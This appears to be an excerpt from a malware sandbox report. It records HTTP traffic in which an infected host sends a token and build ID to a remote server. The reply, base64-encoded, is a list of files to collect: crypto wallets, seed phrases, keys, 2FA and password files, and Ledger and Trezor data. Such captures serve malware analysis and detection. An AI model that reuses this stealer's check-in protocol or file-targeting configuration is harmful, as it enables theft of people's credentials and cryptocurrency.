2024-09-25 18:49:51 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 34 34 32 66 31 34 63 33 62 63 65 63 34 31 63 64 33 36 64 37 65 34 64 66 34 38 63 35 64 31 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 62 66 35 65 34 33 31 38 36 39 36 34 33 61 32 61 63 33 39 37 64 32 64 63 30 64 36 38 37 66 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 Data Ascii: ------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="token"d442f14c3bcec41cd36d7e4df48c5d17------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="build_id"9bf5e431869643a2ac397d2dc0d687fb------CBFBGCGIJKJJKFIDBFCGCont
2024-09-25 18:49:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 18:49:52 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi